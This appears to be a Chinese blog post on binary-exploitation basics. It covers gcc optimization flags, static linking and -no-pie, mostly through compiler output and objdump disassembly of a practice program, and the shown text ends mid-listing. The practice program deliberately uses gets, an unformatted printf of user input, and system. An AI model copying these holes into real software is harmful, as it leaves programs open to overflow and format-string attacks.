{"id":179,"date":"2022-06-16T01:55:01","date_gmt":"2022-06-15T17:55:01","guid":{"rendered":"http:\/\/162.14.82.114\/?p=179"},"modified":"2022-06-16T01:56:06","modified_gmt":"2022-06-15T17:56:06","slug":"pwn%e4%b8%80%e4%ba%9b%e8%b6%85%e7%ba%a7%e5%9f%ba%e7%a1%80%e6%80%a7%e7%9a%84%e7%9f%a5%e8%af%86","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/179\/06\/16\/2022\/","title":{"rendered":"pwn\u4e00\u4e9b\u8d85\u7ea7\u57fa\u7840\u6027\u7684\u77e5\u8bc6"},"content":{"rendered":"

gcc -o<\/h1>\n
\n

gcc -O1\/O2\/O3<\/p>\n

-O\uff0c-O1\uff1a\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7684\u6548\u679c\u662f\u4e00\u6837\u7684\uff0c\u76ee\u7684\u90fd\u662f\u5728\u4e0d\u5f71\u54cd\u7f16\u8bd1\u901f\u5ea6\u7684\u524d\u63d0\u4e0b\uff0c\u5c3d\u91cf\u91c7\u7528\u4e00\u4e9b\u4f18\u5316\u7b97\u6cd5\u964d\u4f4e\u4ee3\u7801\u5927\u5c0f\u548c\u53ef\u6267\u884c\u4ee3\u7801\u7684\u8fd0\u884c\u901f\u5ea6\u3002<\/code><\/p>\n

-O2\u8be5\u4f18\u5316\u9009\u9879\u4f1a\u727a\u7272\u90e8\u5206\u7f16\u8bd1\u901f\u5ea6\uff0c\u9664\u4e86\u6267\u884c-O1\u6240\u6267\u884c\u7684\u6240\u6709\u4f18\u5316\u4e4b\u5916\uff0c\u8fd8\u4f1a\u91c7\u7528\u51e0\u4e4e\u6240\u6709\u7684\u76ee\u6807\u914d\u7f6e\u652f\u6301\u7684\u4f18\u5316\u7b97\u6cd5\uff0c\u7528\u4ee5\u63d0\u9ad8\u76ee\u6807\u4ee3\u7801\u7684\u8fd0\u884c\u901f\u5ea6\u3002<\/code><\/p>\n

-O3\u8be5\u9009\u9879\u9664\u4e86\u6267\u884c-O2\u6240\u6709\u7684\u4f18\u5316\u9009\u9879\u4e4b\u5916\uff0c\u4e00\u822c\u90fd\u662f\u91c7\u53d6\u5f88\u591a\u5411\u91cf\u5316\u7b97\u6cd5\uff0c\u63d0\u9ad8\u4ee3\u7801\u7684\u5e76\u884c\u6267\u884c\u7a0b\u5ea6\uff0c\u5229\u7528\u73b0\u4ee3CPU\u4e2d\u7684\u6d41\u6c34\u7ebf\uff0cCache\u7b49\u3002<\/code><\/p>\n

-Os\u8fd9\u4e2a\u4f18\u5316\u6807\u8bc6\u548c-O3\u6709\u5f02\u66f2\u540c\u5de5\u4e4b\u5999\uff0c\u5f53\u7136\u4e24\u8005\u7684\u76ee\u6807\u4e0d\u4e00\u6837\uff0c-O3\u7684\u76ee\u6807\u662f\u5b81\u613f\u589e\u52a0\u76ee\u6807\u4ee3\u7801\u7684\u5927\u5c0f\uff0c\u4e5f\u8981\u62fc\u547d\u7684\u63d0\u9ad8\u8fd0\u884c\u901f\u5ea6\uff0c\u4f46\u662f\u8fd9\u4e2a\u9009\u9879\u662f\u5728-O2\u7684\u57fa\u7840\u4e4b\u4e0a\uff0c\u5c3d\u91cf\u7684\u964d\u4f4e\u76ee\u6807\u4ee3\u7801\u7684\u5927\u5c0f\uff0c\u8fd9\u5bf9\u4e8e\u5b58\u50a8\u5bb9\u91cf\u5f88\u5c0f\u7684\u8bbe\u5907\u6765\u8bf4\u975e\u5e38\u91cd\u8981\u3002<\/code><\/p>\n

Ofast:\u8be5\u9009\u9879\u5c06\u4e0d\u4f1a\u4e25\u683c\u9075\u5faa\u8bed\u8a00\u6807\u51c6\uff0c\u9664\u4e86\u542f\u7528\u6240\u6709\u7684-O3\u4f18\u5316\u9009\u9879\u4e4b\u5916\uff0c\u4e5f\u4f1a\u9488\u5bf9\u67d0\u4e9b\u8bed\u8a00\u542f\u7528\u90e8\u5206\u4f18\u5316\u3002<\/code><\/p>\n

-Og:\u8be5\u6807\u8bc6\u4f1a\u7cbe\u5fc3\u6311\u9009\u90e8\u5206\u4e0e-g\u9009\u9879\u4e0d\u51b2\u7a81\u7684\u4f18\u5316\u9009\u9879\uff0c\u5f53\u7136\u5c31\u80fd\u63d0\u4f9b\u5408\u7406\u7684\u4f18\u5316\u6c34\u5e73\uff0c\u540c\u65f6\u4ea7\u751f\u8f83\u597d\u7684\u53ef\u8c03\u8bd5\u4fe1\u606f\u548c\u5bf9\u8bed\u8a00\u6807\u51c6\u7684\u9075\u5faa\u7a0b\u5ea6<\/code><\/p>\n

\u8be6\u60c5\u53ef\u4ee5\u53c2\u8003GCC\u4e2d-O1 -O2 -O3 \u4f18\u5316\u7684\u539f\u7406\u662f\u4ec0\u4e48\uff1f - \u77e5\u4e4e (zhihu.com)<\/a> <\/p>\n<\/blockquote>\n

hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ gcc question_1.c -O3 -o question_1_x64_O3\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\nquestion_1.c: In function \u2018func\u2019:\nquestion_1.c:13:2: warning: ignoring return value of \u2018system\u2019, declared with attribute warn_unused_result [-Wunused-result]\n  system(cmd);\n  ^~~~~~~~~~~\n\/tmp\/ccysfJzi.o: In function `main':\nquestion_1.c:(.text.startup+0x32): warning: the `gets' function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ objdump -d question_1_x64_O3 -M intel |less\nquestion_1_x64_O3:     file format elf64-x86-64\nDisassembly of section .init:\n0000000000000708 <_init>:\n 708:   48 83 ec 08             sub    rsp,0x8\n 70c:   48 8b 05 d5 08 20 00    mov    rax,QWORD PTR [rip+0x2008d5]        # 200fe8 <__gmon_start__>\n 713:   48 85 c0                test   rax,rax\n 716:   74 02                   je     71a <_init+0x12>\n 718:   ff d0                   call   rax\n 71a:   48 83 c4 08             add    rsp,0x8\n 71e:   c3                      ret\n\nDisassembly of section .plt:\n\n0000000000000720 <.plt>:\n 720:   ff 35 72 08 20 00       push   QWORD PTR [rip+0x200872]        # 200f98 <_GLOBAL_OFFSET_TABLE_+0x8>\n 726:   ff 25 74 08 20 00       jmp    QWORD PTR [rip+0x200874]        # 200fa0 <_GLOBAL_OFFSET_TABLE_+0x10>\n 72c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n\n0000000000000730 <puts@plt>:\n 730:   ff 25 72 08 20 00       jmp    QWORD PTR [rip+0x200872]        # 200fa8 <puts@GLIBC_2.2.5>\n 736:   68 00 00 00 00          push   0x0\n 73b:   e9 e0 ff ff ff          jmp    720 <.plt>\n\n0000000000000740 <__stack_chk_fail@plt>:\n 740:   ff 25 6a 08 20 00       jmp    QWORD PTR [rip+0x20086a]        # 200fb0 <__stack_chk_fail@GLIBC_2.4>\n 746:   68 01 00 00 00          push   0x1\n 74b:   e9 d0 ff ff ff          jmp    720 <.plt>\n\n0000000000000750 <system@plt>:\n 750:   ff 25 62 08 20 00       jmp    QWORD PTR [rip+0x200862]        # 200fb8 <system@GLIBC_2.2.5>\n 756:   68 02 00 00 00          push   0x2\n 75b:   e9 c0 ff ff ff          jmp    720 <.plt>\n\n0000000000000760 <gets@plt>:\n 760:   ff 25 5a 08 20 00       jmp    QWORD PTR [rip+0x20085a]        # 200fc0 <gets@GLIBC_2.2.5>\n 766:   68 03 00 00 00          push   0x3\n 76b:   e9 b0 ff ff ff          jmp    720 <.plt>\n\n0000000000000770 <__printf_chk@plt>:\n 770:   ff 25 52 08 20 00       jmp    QWORD PTR [rip+0x200852]        # 200fc8 <__printf_chk@GLIBC_2.3.4>\n 776:   68 04 00 00 00          push   0x4\n 77b:   e9 a0 ff ff ff          jmp    720 <.plt>\n\n0000000000000780 <setvbuf@plt>:\n 780:   ff 25 4a 08 20 00       jmp    QWORD PTR [rip+0x20084a]        # 200fd0 <setvbuf@GLIBC_2.2.5>\n 786:   68 05 00 00 00          push   0x5\n 78b:   e9 90 ff ff ff          jmp    720 <.plt>\n\nDisassembly of section .plt.got:\n\n0000000000000790 <__cxa_finalize@plt>:\n 790:   ff 25 62 08 20 00       jmp    QWORD PTR [rip+0x200862]        # 200ff8 <__cxa_finalize@GLIBC_2.2.5>\n 796:   66 90                   xchg   ax,ax\n\nDisassembly of section .text:\n\n00000000000007a0 <main>:\n 7a0:   53                      push   rbx\n 7a1:   48 8d 3d 5c 02 00 00    lea    rdi,[rip+0x25c]        # a04 <_IO_stdin_used+0x4>\n 7a8:   48 83 ec 10             sub    rsp,0x10\n 7ac:   48 89 e3                mov    rbx,rsp\n 7af:   48 c7 04 24 00 00 00    mov    QWORD PTR [rsp],0x0\n 7b6:   00\n 7b7:   64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n 7be:   00 00\n 7c0:   48 89 44 24 08          mov    QWORD PTR [rsp+0x8],rax\n 7c5:   31 c0                   xor    eax,eax\n 7c7:   e8 64 ff ff ff          call   730 <puts@plt>\n 7cc:   48 89 df                mov    rdi,rbx\n 7cf:   31 c0                   xor    eax,eax\n 7d1:   e8 8a ff ff ff          call   760 <gets@plt>\n 7d6:   31 c0                   xor    eax,eax\n 7d8:   48 89 de                mov    rsi,rbx\n 7db:   bf 01 00 00 00          mov    edi,0x1\n 7e0:   e8 8b ff ff ff          call   770 <__printf_chk@plt>\n 7e5:   48 8b 54 24 08          mov    rdx,QWORD PTR [rsp+0x8]\n 7ea:   64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n 7f1:   00 00\n 7f3:   75 08                   jne    7fd <main+0x5d>\n 7f5:   48 83 c4 10             add    rsp,0x10\n 7f9:   31 c0                   xor    eax,eax\n 7fb:   5b                      pop    rbx\n 7fc:   c3                      ret\n 7fd:   e8 3e ff ff ff          call   740 <__stack_chk_fail@plt>\n 802:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 809:   00 00 00\n 80c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n\n0000000000000810 <_start>:\n 810:   31 ed                   xor    ebp,ebp\n 812:   49 89 d1                mov    r9,rdx\n 815:   5e                      pop    rsi\n 816:   48 89 e2                mov    rdx,rsp\n 819:   48 83 e4 f0             and    rsp,0xfffffffffffffff0\n 81d:   50                      push   rax\n 81e:   54                      push   rsp\n 81f:   4c 8d 05 ca 01 00 00    lea    r8,[rip+0x1ca]        # 9f0 <__libc_csu_fini>\n 826:   48 8d 0d 53 01 00 00    lea    rcx,[rip+0x153]        # 980 <__libc_csu_init>\n 82d:   48 8d 3d 6c ff ff ff    lea    rdi,[rip+0xffffffffffffff6c]        # 7a0 <main>\n 834:   ff 15 a6 07 20 00       call   QWORD PTR [rip+0x2007a6]        # 200fe0 <__libc_start_main@GLIBC_2.2.5>\n 83a:   f4                      hlt\n 83b:   0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]\n\n0000000000000840 <deregister_tm_clones>:\n 840:   48 8d 3d d1 07 20 00    lea    rdi,[rip+0x2007d1]        # 201018 <__TMC_END__>\n 847:   55                      push   rbp\n 848:   48 8d 05 c9 07 20 00    lea    rax,[rip+0x2007c9]        # 201018 <__TMC_END__>\n 84f:   48 39 f8                cmp    rax,rdi\n 852:   48 89 e5                mov    rbp,rsp\n 855:   74 19                   je     870 <deregister_tm_clones+0x30>\n 857:   48 8b 05 7a 07 20 00    mov    rax,QWORD PTR [rip+0x20077a]        # 200fd8 <_ITM_deregisterTMCloneTable>\n 85e:   48 85 c0                test   rax,rax\n 861:   74 0d                   je     870 <deregister_tm_clones+0x30>\n 863:   5d                      pop    rbp\n 864:   ff e0                   jmp    rax\n 866:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 86d:   00 00 00\n 870:   5d                      pop    rbp\n 871:   c3                      ret\n 872:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n 876:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 87d:   00 00 00\n\n0000000000000880 <register_tm_clones>:\n 880:   48 8d 3d 91 07 20 00    lea    rdi,[rip+0x200791]        # 201018 <__TMC_END__>\n 887:   48 8d 35 8a 07 20 00    lea    rsi,[rip+0x20078a]        # 201018 <__TMC_END__>\n 88e:   55                      push   rbp\n 88f:   48 29 fe                sub    rsi,rdi\n 892:   48 89 e5                mov    rbp,rsp\n 895:   48 c1 fe 03             sar    rsi,0x3\n 899:   48 89 f0                mov    rax,rsi\n 89c:   48 c1 e8 3f             shr    rax,0x3f\n 8a0:   48 01 c6                add    rsi,rax\n 8a3:   48 d1 fe                sar    rsi,1\n 8a6:   74 18                   je     8c0 <register_tm_clones+0x40>\n 8a8:   48 8b 05 41 07 20 00    mov    rax,QWORD PTR [rip+0x200741]        # 200ff0 <_ITM_registerTMCloneTable>\n 8af:   48 85 c0                test   rax,rax\n 8b2:   74 0c                   je     8c0 <register_tm_clones+0x40>\n 8b4:   5d                      pop    rbp\n 8b5:   ff e0                   jmp    rax\n 8b7:   66 0f 1f 84 00 00 00    nop    WORD PTR [rax+rax*1+0x0]\n 8be:   00 00\n 8c0:   5d                      pop    rbp\n 8c1:   c3                      ret\n 8c2:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n 8c6:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 8cd:   00 00 00\n\n00000000000008d0 <__do_global_dtors_aux>:\n 8d0:   80 3d 71 07 20 00 00    cmp    BYTE PTR [rip+0x200771],0x0        # 201048 <completed.7698>\n 8d7:   75 2f                   jne    908 <__do_global_dtors_aux+0x38>\n 8d9:   48 83 3d 17 07 20 00    cmp    QWORD PTR [rip+0x200717],0x0        # 200ff8 <__cxa_finalize@GLIBC_2.2.5>\n 8e0:   00\n 8e1:   55                      push   rbp\n 8e2:   48 89 e5                mov    rbp,rsp\n 8e5:   74 0c                   je     8f3 <__do_global_dtors_aux+0x23>\n 8e7:   48 8b 3d 1a 07 20 00    mov    rdi,QWORD PTR [rip+0x20071a]        # 201008 <__dso_handle>\n 8ee:   e8 9d fe ff ff          call   790 <__cxa_finalize@plt>\n 8f3:   e8 48 ff ff ff          call   840 <deregister_tm_clones>\n 8f8:   c6 05 49 07 20 00 01    mov    BYTE PTR [rip+0x200749],0x1        # 201048 <completed.7698>\n 8ff:   5d                      pop    rbp\n 900:   c3                      ret\n 901:   0f 1f 80 00 00 00 00    nop    DWORD PTR [rax+0x0]\n 908:   f3 c3                   repz ret\n 90a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000910 <frame_dummy>:\n 910:   55                      push   rbp\n 911:   48 89 e5                mov    rbp,rsp\n 914:   5d                      pop    rbp\n 915:   e9 66 ff ff ff          jmp    880 <register_tm_clones>\n 91a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000920 <init_func>:\n 920:   48 83 ec 08             sub    rsp,0x8\n 924:   48 8b 3d 05 07 20 00    mov    rdi,QWORD PTR [rip+0x200705]        # 201030 <stdin@@GLIBC_2.2.5>\n 92b:   31 c9                   xor    ecx,ecx\n 92d:   ba 02 00 00 00          mov    edx,0x2\n 932:   31 f6                   xor    esi,esi\n 934:   e8 47 fe ff ff          call   780 <setvbuf@plt>\n 939:   48 8b 3d e0 06 20 00    mov    rdi,QWORD PTR [rip+0x2006e0]        # 201020 <stdout@@GLIBC_2.2.5>\n 940:   31 c9                   xor    ecx,ecx\n 942:   ba 02 00 00 00          mov    edx,0x2\n 947:   31 f6                   xor    esi,esi\n 949:   e8 32 fe ff ff          call   780 <setvbuf@plt>\n 94e:   48 8b 3d eb 06 20 00    mov    rdi,QWORD PTR [rip+0x2006eb]        # 201040 <stderr@@GLIBC_2.2.5>\n 955:   31 c9                   xor    ecx,ecx\n 957:   ba 02 00 00 00          mov    edx,0x2\n 95c:   31 f6                   xor    esi,esi\n 95e:   e8 1d fe ff ff          call   780 <setvbuf@plt>\n 963:   31 c0                   xor    eax,eax\n 965:   48 83 c4 08             add    rsp,0x8\n 969:   c3                      ret\n 96a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000970 <func>:\n 970:   48 83 ec 08             sub    rsp,0x8\n 974:   e8 d7 fd ff ff          call   750 <system@plt>\n 979:   31 c0                   xor    eax,eax\n 97b:   48 83 c4 08             add    rsp,0x8\n 97f:   c3                      ret\n\n0000000000000980 <__libc_csu_init>:\n 980:   41 57                   push   r15\n 982:   41 56                   push   r14\n 984:   49 89 d7                mov    r15,rdx\n 987:   41 55                   push   r13\n 989:   41 54                   push   r12\n 98b:   4c 8d 25 fe 03 20 00    lea    r12,[rip+0x2003fe]        # 200d90 <__frame_dummy_init_array_entry>\n 992:   55                      push   rbp\n 993:   48 8d 2d fe 03 20 00    lea    rbp,[rip+0x2003fe]        # 200d98 <__init_array_end>\n 99a:   53                      push   rbx\n 99b:   41 89 fd                mov    r13d,edi\n 99e:   49 89 f6                mov    r14,rsi\n 9a1:   4c 29 e5                sub    rbp,r12\n 9a4:   48 83 ec 08             sub    rsp,0x8\n 9a8:   48 c1 fd 03             sar    rbp,0x3\n 9ac:   e8 57 fd ff ff          call   708 <_init>\n 9b1:   48 85 ed                test   rbp,rbp\n 9b4:   74 20                   je     9d6 <__libc_csu_init+0x56>\n 9b6:   31 db                   xor    ebx,ebx\n 9b8:   0f 1f 84 00 00 00 00    nop    DWORD PTR [rax+rax*1+0x0]\n 9bf:   00\n 9c0:   4c 89 fa                mov    rdx,r15\n 9c3:   4c 89 f6                mov    rsi,r14\n 9c6:   44 89 ef                mov    edi,r13d\n 9c9:   41 ff 14 dc             call   QWORD PTR [r12+rbx*8]\n 9cd:   48 83 c3 01             add    rbx,0x1\n 9d1:   48 39 dd                cmp    rbp,rbx\n 9d4:   75 ea                   jne    9c0 <__libc_csu_init+0x40>\n 9d6:   48 83 c4 08             add    rsp,0x8\n 9da:   5b                      pop    rbx\n 9db:   5d                      pop    rbp\n 9dc:   41 5c                   pop    r12\n 9de:   41 5d                   pop    r13\n 9e0:   41 5e                   pop    r14\n 9e2:   41 5f                   pop    r15\n 9e4:   c3                      ret\n 9e5:   90                      nop\n 9e6:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 9ed:   00 00 00\n\n00000000000009f0 <__libc_csu_fini>:\n 9f0:   f3 c3                   repz ret\n\nDisassembly of section .fini:\n\n00000000000009f4 <_fini>:\n 9f4:   48 83 ec 08             sub    rsp,0x8\n 9f8:   48 83 c4 08             add    rsp,0x8\n 9fc:   c3                      ret\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ .\/question_1_x64_O3\ninput:\naaaaaaaaaaaaaaa\n*** stack smashing detected ***: <unknown> terminated\nAborted<\/code><\/pre>\n
gcc -O3<\/code>\u9ed8\u8ba4\u5c06\u4e0d\u53ef\u80fd\u6267\u884c\u7684\u5185\u5bb9\u76f4\u63a5\u5220\u9664\u4e86\uff0c\u6240\u4ee5\u65e0\u6cd5\u6267\u884cshell<\/p>\n
static<\/h1>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ls\nquestion_1.c\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccU59NVv.o: In function `main':\nquestion_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c -static -o question_1_x64_static\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccS7KXgP.o: In function `main':\nquestion_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ls\na.out  question_1.c  question_1_x64_static\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ file a.out\na.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=89a75bb48f86071b8e7a8066be9f400348d5e184, not stripped\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ file question_1_x64_static\nquestion_1_x64_static: ELF 64-bit LSB executable, x86-64, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 3.2.0, BuildID[sha1]=9d9740dc1b64a1dda55f20df2c02af26eaf10793, not stripped\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ldd a.out\n        linux-vdso.so.1 (0x00007ffeee7ed000)\n        libc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fdaf2dcd000)\n        \/lib64\/ld-linux-x86-64.so.2 (0x00007fdaf33c0000)\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ldd question_1_x64_static\n        not a dynamic executable\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ll -h\ntotal 844K\ndrwxrwxrwx 1 hack hack 4.0K Jun 14 13:31 .\/\ndrwxrwxrwx 1 hack hack 4.0K Jun 10 17:53 ..\/\n-rwxrwxrwx 1 hack hack 8.6K Jun 14 13:30 a.out*\n-rwxrwxrwx 1 hack hack  409 Jun 10 17:53 question_1.c*\n-rwxrwxrwx 1 hack hack 831K Jun 14 13:31 question_1_x64_static*<\/code><\/pre>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d question_1_x64_static  -M intel |less\n#\u53ea\u622a\u53d6\u4e86main\uff0c\u548c\u4e0b\u9762\u5bf9\u6bd4\u4e00\u4e0b\uff1a\n0000000000400bf1 <main>:\n  400bf1:       55                      push   rbp\n  400bf2:       48 89 e5                mov    rbp,rsp\n  400bf5:       48 83 ec 20             sub    rsp,0x20\n  400bf9:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n  400c00:       00 00\n  400c02:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n  400c06:       31 c0                   xor    eax,eax\n  400c08:       48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n  400c0f:       00\n  400c10:       48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n  400c17:       00\n  400c18:       48 8d 3d a5 21 09 00    lea    rdi,[rip+0x921a5]        # 492dc4 <_IO_stdin_used+0x4>\n  400c1f:       e8 fc fd 00 00          call   410a20 <_IO_puts>\n  400c24:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  400c28:       48 89 c7                mov    rdi,rax\n  400c2b:       b8 00 00 00 00          mov    eax,0x0\n  400c30:       e8 3b fc 00 00          call   410870 <_IO_gets>\n  400c35:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  400c39:       48 89 c7                mov    rdi,rax\n  400c3c:       b8 00 00 00 00          mov    eax,0x0\n  400c41:       e8 aa ef 00 00          call   40fbf0 <_IO_printf>\n  400c46:       0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n  400c4a:       3c 61                   cmp    al,0x61\n  400c4c:       75 0c                   jne    400c5a <main+0x69>\n  400c4e:       48 8d 3d 9b 94 2b 00    lea    rdi,[rip+0x2b949b]        # 6ba0f0 <sh>\n  400c55:       e8 78 ff ff ff          call   400bd2 <func>\n  400c5a:       b8 00 00 00 00          mov    eax,0x0\n  400c5f:       48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n  400c63:       64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n  400c6a:       00 00\n  400c6c:       74 05                   je     400c73 <main+0x82>\n  400c6e:       e8 4d b2 04 00          call   44bec0 <__stack_chk_fail>\n  400c73:       c9                      leave\n  400c74:       c3                      ret\n  400c75:       66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n  400c7c:       00 00 00\n  400c7f:       90                      nop\n hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d a.out  -M intel |less\n 000000000000090e <main>:\n 90e:   55                      push   rbp\n 90f:   48 89 e5                mov    rbp,rsp\n 912:   48 83 ec 20             sub    rsp,0x20\n 916:   64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n 91d:   00 00\n 91f:   48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n 923:   31 c0                   xor    eax,eax\n 925:   48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n 92c:   00\n 92d:   48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n 934:   00\n 935:   48 8d 3d e8 00 00 00    lea    rdi,[rip+0xe8]        # a24 <_IO_stdin_used+0x4>\n 93c:   e8 cf fd ff ff          call   710 <puts@plt>\n 941:   48 8d 45 e8             lea    rax,[rbp-0x18]\n 945:   48 89 c7                mov    rdi,rax\n 948:   b8 00 00 00 00          mov    eax,0x0\n 94d:   e8 fe fd ff ff          call   750 <gets@plt>\n 952:   48 8d 45 e8             lea    rax,[rbp-0x18]\n 956:   48 89 c7                mov    rdi,rax\n 959:   b8 00 00 00 00          mov    eax,0x0\n 95e:   e8 dd fd ff ff          call   740 <printf@plt>\n 963:   0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n 967:   3c 61                   cmp    al,0x61\n 969:   75 0c                   jne    977 <main+0x69>\n 96b:   48 8d 3d 9e 06 20 00    lea    rdi,[rip+0x20069e]        # 201010 <sh>\n 972:   e8 78 ff ff ff          call   8ef <func>\n 977:   b8 00 00 00 00          mov    eax,0x0\n 97c:   48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n 980:   64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n 987:   00 00\n 989:   74 05                   je     990 <main+0x82>\n 98b:   e8 90 fd ff ff          call   720 <__stack_chk_fail@plt>\n 990:   c9                      leave\n 991:   c3                      ret\n 992:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 999:   00 00 00\n 99c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]<\/code><\/pre>\n
no-pie<\/h1>\n
\u57fa\u7840\u77e5\u8bc6<\/h2>\n
\n
PIE(position-independent executable)\u662f\u4e00\u79cd\u751f\u6210\u5730\u5740\u65e0\u5173\u53ef\u6267\u884c\u7a0b\u5e8f\u7684\u6280\u672f\u3002\u5982\u679c\u7f16\u8bd1\u5668\u5728\u751f\u6210\u53ef\u6267\u884c\u7a0b\u5e8f\u7684\u8fc7\u7a0b\u4e2d\u4f7f\u7528\u4e86PIE\uff0c\u90a3\u4e48\u5f53\u53ef\u6267\u884c\u7a0b\u5e8f\u88ab\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u65f6\u5176\u52a0\u8f7d\u5730\u5740\u5b58\u5728\u4e0d\u53ef\u9884\u77e5\u6027\u3002<\/p>\n
\u8be6\u7ec6\u53ef\u4ee5\u770bhttps:\/\/blog.csdn.net\/weixin_33842304\/article\/details\/91443399<\/p>\n<\/blockquote>\n
hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c -no-pie -o question_1_x64_nopie\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccpFE2xY.o: In function `main':\nquestion_1.c:(.text+0xc4): warning: the `gets' function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ll\ntotal 856\ndrwxrwxrwx 1 hack hack   4096 Jun 15 00:14 .\/\ndrwxrwxrwx 1 hack hack   4096 Jun 10 17:53 ..\/\n-rwxrwxrwx 1 hack hack   8760 Jun 14 13:30 a.out*\n-rwxrwxrwx 1 hack hack    409 Jun 10 17:53 question_1.c*\n-rwxrwxrwx 1 hack hack   8728 Jun 15 00:14 question_1_x64_nopie*\n-rwxrwxrwx 1 hack hack 850080 Jun 14 13:31 question_1_x64_static*\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d question_1_x64_nopie -M intel |less\n00000000004007bb <main>:\n  4007bb:       55                      push   rbp\n  4007bc:       48 89 e5                mov    rbp,rsp\n  4007bf:       48 83 